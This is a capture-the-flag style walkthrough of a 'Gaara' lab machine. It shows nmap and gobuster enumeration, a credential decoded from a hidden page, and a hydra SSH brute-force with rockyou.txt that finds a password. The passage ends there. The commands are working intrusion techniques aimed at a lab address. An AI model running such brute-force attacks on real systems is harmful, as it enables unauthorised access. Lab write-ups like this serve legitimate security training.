Pwned Date - 27th Jun 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Seems like there is nothing from the fuzzy duck

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.201.142 -w /usr/share/wordlists/dirb/common.txt -q -t 100               
/.htpasswd            (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 280]

Except a wallpaper from some Naruto character?

Untitled

Tried a different wordlist because it really has nothing hmm

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.201.142 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 300  
/server-status        (Status: 403) [Size: 280]
/Cryoserver           (Status: 200) [Size: 327]

We found /Cryoserver and scroll to the end we have 3 entries

/Temari
/Kazekage
/iamGaara

Till some point we got this on /iamGaara

Untitled

f1MgN9mTf9SNbzRygcU

Exploitation

I don’t know how to use CyberChef anyway I got the credential

Untitled

gaara:ismyname

Anyway, using hydra was a lot faster I got the password less than 1 minute

┌──(kali㉿VirtualBox)-[~]
└─$ hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.201.142 -t 64 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2022-06-27 10:34:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.201.142:22/
[22][ssh] host: 192.168.201.142   login: gaara   password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 20 final worker threads did not complete until end.
[ERROR] 20 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2022-06-27 10:35:07